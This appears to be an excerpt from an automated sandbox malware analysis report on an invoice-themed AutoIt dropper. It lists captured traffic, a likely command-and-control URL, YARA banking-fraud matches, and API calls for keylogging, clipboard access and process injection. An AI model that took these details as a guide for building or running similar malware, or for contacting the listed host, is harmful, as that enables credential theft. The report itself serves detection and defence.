99 2e 4f 5b c7 27 59 96 f1 6c c4 ad 9c 27 4e 54 58 c3 63 e6 c8 ec 43 08 86 2d 32 48 5b 57 e1 c3 1f d1 fb 75 83 01 72 65 8e ad f6 84 67 27 3c e8 b9 30 16 1f b3 95 93 47 90 23 fe f9 f7 df 3e 76 31 45 d3 5e 2f af 10 e4 b4 c7 18 63 79 8d 1e 5a ab 04 bf 2e e8 ba 88 de 74 ec 25 e7 eb 06 23 b6 e1 b2 88 3c ae 3c 0f c9 99 30 51 81 75 e8 8b 4f e7 ef 93 17 d1 c6 8f f3 6b 85 2c 44 bd c1 0a e7 36 ba f0 fc bc 31 62 51 67 35 d9 69 2e 74 f9 d7 58 28 03 57 97 f1 a1 30 b9 27 93 e0 21 79 48 b1 7a 48 9a 6e 65 07 a2 3d f0 36 ae 22 89 63 6d fc 60 3b 49 40 53 0d 1e 87 ec db 0e 18 1e 49 ae 51 b0 1e 33 6d 34 b2 47 54 37 c6 7a d0 7e bf 9d ef bd dd 67 d8 d8 dc d8 fa 98 8f 99 32 e2 ea 41 cb 10 c6 26 82 c4 55 74 d7 c3 35 39 9a 91 22 bf 1e b3 8a a4 44 fd 1f 5e 44 65 ec 1d fb c6 38 f2 64 f4 98 c1 cc 19 b5 f0 78 68 df a6 93 b7 f9 3c 76 46 3e 27 9f 5e 25 6f 4c dd 80 a7 99 3a 3c 26 bf be 2b 50 96 18 1d 5a 6a a8 b1 88 ae 09 97 81 ad 03 f0 92 a4 af 0a 89 d7 24 30 69 27 31 23 4d 9e 40 25 4e 80 c2 62 b4 75 e4 c9 2b 9c 9e 99 c6 c5 cc 99 1a 7d 45 ba 64 ca 38 9f f3 4e 77 6f 41 89 4e 58 6a c2 46 0f d6 ec 5c 28 63 ae 1c 53 74 85 cc 57 c8 1a 28 91 91 6b fd a5 ec a3 07 eb d9 da 2c 2c 5b e2 cc 91 47 66 74 8b 13 15 42 93 6e 63 52 a4 af 58 8d 92 a0 88 40 a9 88 59 54 45 d4 12 e7 2a 44 1f b1 ca e2 bc 88 78 e5 a5 11 ee 6f b4 d6 d8 8e d8 74 5f 1d 9d 9b 23 a6 81 74 37 e6 bc 86 95 90 3a 9d 19 e3 9d b7 d0 84 49 68 56 3b 01 3f 4d 4f d3 e7 a1 e8 f6 b2 b4 26 7d 6f a1 db 7e e7 46 7b 97 96 c6 94 0a a1 a1 ae 03 0a e7 7e 9a 43 4d 6a 5d 9c 35 a8 7f fc 08 da 8d 4f b3 2c 3e cd 32 8a 9f 64 59 18 14 3f cb b2 30 28 7e 9e 65 61 50 fc 22 cb c2 a0 fb 4c 4c 7b 9b 2e d1 66 64 df 16 06 f3 85 16 21 43 03 8a 5d 6c e2 32 b6 31 c4 f5 f0 1b 5d f4 7f 69 a3 7a a5 41 ad 3d 09 77 36 fb 82 c2 f7 2f 0b 3b a1 0b 7b 59 84 9f 9b 9b 9d fd f0 f6 11 6f 9d 07 48 fa b5 e8 5e 37 37 17 97 c3 b4 59 b8 6a 00 b6 5c d4 a8 bd 1b 7e 8f 5b a5 2a 46 3f 68 5c b2 b7 e0 71 30 9c 40 e1 52 61 11 3c be 53 18 80 03 33 8c 6f b9 af 0b 97 96 e8 37 6a f7 7a 7d 0e e5 07 a8 71 60 86 17 d9 e5 04 52 70 6b 2d 8a d1 04 52 67 45 51 4e ea b4 01 8b da 7f 30 12 53 d2 0e ad 7f 8d 73 63 71 10 b6 bb af
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmllast-modified: Wed, 18 Jan 2023 19:41:46 GMTetag: "999-63c84b7a-3d7f793868cb3f69;;;"accept-ranges: bytescontent-length: 2457date: Sat, 08 Mar 2025 04:50:34 GMTserver: LiteSpeedplatform: hostingerpanel: hpanelData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 20 20 20 20 20 20 20 20 5b 6e 67 5c 3a 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 64 61 74 61 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 78 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 78 2d 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 68 69 64 65 3a 6e 6f 74 28 2e 6e 67 2d 68 69 64 65 2d 61 6e 69 6d 61 74 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 6e 67 5c 3a 66 6f 72 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 69 6d 61 74 65 2d 73 68 69 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 63 68 6f 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 08 Mar 2025 04:50:50 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: ZjXK6gQah.exe, 00000008.00000002.2567014493.00000000058EC000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.bellysweep.net
Source: ZjXK6gQah.exe, 00000008.00000002.2567014493.00000000058EC000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.bellysweep.net/5d48/
Source: SyncHost.exe, 00000005.00000002.2567983897.00000000082BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org?q=
Source: SyncHost.exe, 00000005.00000002.2567983897.00000000082BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: SyncHost.exe, 00000005.00000002.2567983897.00000000082BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: SyncHost.exe, 00000005.00000002.2567983897.00000000082BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SyncHost.exe, 00000005.00000002.2567983897.00000000082BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?q=
Source: SyncHost.exe, 00000005.00000002.2567983897.00000000082BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: SyncHost.exe, 00000005.00000002.2567983897.00000000082BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
Source: SyncHost.exe, 00000005.00000002.2566440680.0000000005C96000.00000004.10000000.00040000.00000000.sdmp, ZjXK6gQah.exe, 00000008.00000002.2565823992.00000000039C6000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: SyncHost.exe, 00000005.00000002.2567983897.00000000082BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gemini.google.com/app?q=
Source: SyncHost.exe, 00000005.00000002.2564765311.0000000003395000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: SyncHost.exe, 00000005.00000002.2564765311.0000000003395000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: SyncHost.exe, 00000005.00000002.2564765311.0000000003395000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: SyncHost.exe, 00000005.00000002.2564765311.0000000003395000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: SyncHost.exe, 00000005.00000002.2564765311.0000000003395000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: SyncHost.exe, 00000005.00000002.2564765311.0000000003395000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: SyncHost.exe, 00000005.00000003.2055629705.000000000829C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: SyncHost.exe, 00000005.00000002.2566440680.0000000005C96000.00000004.10000000.00040000.00000000.sdmp, ZjXK6gQah.exe, 00000008.00000002.2565823992.00000000039C6000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css
Source: SyncHost.exe, 00000005.00000002.2567983897.00000000082BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: SyncHost.exe, 00000005.00000002.2566440680.0000000005C96000.00000004.10000000.00040000.00000000.sdmp, ZjXK6gQah.exe, 00000008.00000002.2565823992.00000000039C6000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: SyncHost.exe, 00000005.00000002.2566440680.0000000005B04000.00000004.10000000.00040000.00000000.sdmp, ZjXK6gQah.exe, 00000008.00000002.2565823992.0000000003834000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2165842541.00000000393A4000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: SyncHost.exe, 00000005.00000002.2567983897.00000000082BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_00634164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_00634164
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_00634164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_00634164
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_00633F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_00633F66
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_0062001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 0_2_0062001C
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_0064CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 0_2_0064CABC

E-Banking Fraud

barindex
Source: Yara match File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.2564695686.0000000003310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2564412584.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2564632613.00000000032C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1843534772.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1843864079.00000000033A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2567014493.0000000005880000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1844293930.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2565572291.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

barindex
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: This is a third-party compiled AutoIt script. 0_2_005C3B3A
Source: INVOICE #546 JPT.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: INVOICE #546 JPT.exe, 00000000.00000002.1312058969.0000000000674000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_886ba92a-5
Source: INVOICE #546 JPT.exe, 00000000.00000002.1312058969.0000000000674000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_07945bc2-8
Source: INVOICE #546 JPT.exe String found in binary or memory: This is a third-party compiled AutoIt script. memstr_7ccc124d-2
Source: INVOICE #546 JPT.exe String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_d0472d66-a
Source: initial sample Static PE information: Filename: INVOICE #546 JPT.exe
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0042CF73 NtClose, 1_2_0042CF73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572B60 NtClose,LdrInitializeThunk, 1_2_03572B60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572DF0 NtQuerySystemInformation,LdrInitializeThunk, 1_2_03572DF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572C70 NtFreeVirtualMemory,LdrInitializeThunk, 1_2_03572C70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035735C0 NtCreateMutant,LdrInitializeThunk, 1_2_035735C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03574340 NtSetContextThread, 1_2_03574340
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03574650 NtSuspendThread, 1_2_03574650
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572BF0 NtAllocateVirtualMemory, 1_2_03572BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572BE0 NtQueryValueKey, 1_2_03572BE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572B80 NtQueryInformationFile, 1_2_03572B80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572BA0 NtEnumerateValueKey, 1_2_03572BA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572AD0 NtReadFile, 1_2_03572AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572AF0 NtWriteFile, 1_2_03572AF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572AB0 NtWaitForSingleObject, 1_2_03572AB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572F60 NtCreateProcessEx, 1_2_03572F60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572F30 NtCreateSection, 1_2_03572F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572FE0 NtCreateFile, 1_2_03572FE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572F90 NtProtectVirtualMemory, 1_2_03572F90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572FB0 NtResumeThread, 1_2_03572FB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572FA0 NtQuerySection, 1_2_03572FA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572E30 NtWriteVirtualMemory, 1_2_03572E30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572EE0 NtQueueApcThread, 1_2_03572EE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572E80 NtReadVirtualMemory, 1_2_03572E80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572EA0 NtAdjustPrivilegesToken, 1_2_03572EA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572D10 NtMapViewOfSection, 1_2_03572D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572D00 NtSetInformationFile, 1_2_03572D00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572D30 NtUnmapViewOfSection, 1_2_03572D30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572DD0 NtDelayExecution, 1_2_03572DD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572DB0 NtEnumerateKey, 1_2_03572DB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572C60 NtCreateKey, 1_2_03572C60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572C00 NtQueryInformationProcess, 1_2_03572C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572CC0 NtQueryVirtualMemory, 1_2_03572CC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572CF0 NtOpenProcess, 1_2_03572CF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572CA0 NtQueryInformationToken, 1_2_03572CA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03573010 NtOpenDirectoryObject, 1_2_03573010
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03573090 NtSetValueKey, 1_2_03573090
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035739B0 NtGetContextThread, 1_2_035739B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03573D70 NtOpenThread, 1_2_03573D70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03573D10 NtOpenProcessToken, 1_2_03573D10
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05164650 NtSuspendThread,LdrInitializeThunk, 5_2_05164650
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05164340 NtSetContextThread,LdrInitializeThunk, 5_2_05164340
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05162D10 NtMapViewOfSection,LdrInitializeThunk, 5_2_05162D10
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05162D30 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_05162D30
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05162DD0 NtDelayExecution,LdrInitializeThunk, 5_2_05162DD0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05162DF0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_05162DF0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05162C70 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_05162C70
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05162C60 NtCreateKey,LdrInitializeThunk, 5_2_05162C60
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05162CA0 NtQueryInformationToken,LdrInitializeThunk, 5_2_05162CA0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05162F30 NtCreateSection,LdrInitializeThunk, 5_2_05162F30
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05162FB0 NtResumeThread,LdrInitializeThunk, 5_2_05162FB0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05162FE0 NtCreateFile,LdrInitializeThunk, 5_2_05162FE0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05162E80 NtReadVirtualMemory,LdrInitializeThunk, 5_2_05162E80
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05162EE0 NtQueueApcThread,LdrInitializeThunk, 5_2_05162EE0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05162B60 NtClose,LdrInitializeThunk, 5_2_05162B60
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05162BA0 NtEnumerateValueKey,LdrInitializeThunk, 5_2_05162BA0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05162BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_05162BF0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05162BE0 NtQueryValueKey,LdrInitializeThunk, 5_2_05162BE0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05162AD0 NtReadFile,LdrInitializeThunk, 5_2_05162AD0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05162AF0 NtWriteFile,LdrInitializeThunk, 5_2_05162AF0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051635C0 NtCreateMutant,LdrInitializeThunk, 5_2_051635C0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051639B0 NtGetContextThread,LdrInitializeThunk, 5_2_051639B0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05162D00 NtSetInformationFile, 5_2_05162D00
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05162DB0 NtEnumerateKey, 5_2_05162DB0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05162C00 NtQueryInformationProcess, 5_2_05162C00
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05162CC0 NtQueryVirtualMemory, 5_2_05162CC0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05162CF0 NtOpenProcess, 5_2_05162CF0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05162F60 NtCreateProcessEx, 5_2_05162F60
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05162F90 NtProtectVirtualMemory, 5_2_05162F90
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05162FA0 NtQuerySection, 5_2_05162FA0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05162E30 NtWriteVirtualMemory, 5_2_05162E30
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05162EA0 NtAdjustPrivilegesToken, 5_2_05162EA0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05162B80 NtQueryInformationFile, 5_2_05162B80
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05162AB0 NtWaitForSingleObject, 5_2_05162AB0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05163010 NtOpenDirectoryObject, 5_2_05163010
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05163090 NtSetValueKey, 5_2_05163090
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05163D10 NtOpenProcessToken, 5_2_05163D10
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_05163D70 NtOpenThread, 5_2_05163D70
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_02DB9A20 NtReadFile, 5_2_02DB9A20
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_02DB9BC0 NtClose, 5_2_02DB9BC0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_02DB9B20 NtDeleteFile, 5_2_02DB9B20
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_02DB98B0 NtCreateFile, 5_2_02DB98B0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_02DB9D30 NtAllocateVirtualMemory, 5_2_02DB9D30
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_0062A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle, 0_2_0062A1EF
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_00618310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_00618310
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_006251BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 0_2_006251BD
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005ED975 0_2_005ED975
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005E21C5 0_2_005E21C5
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005F62D2 0_2_005F62D2
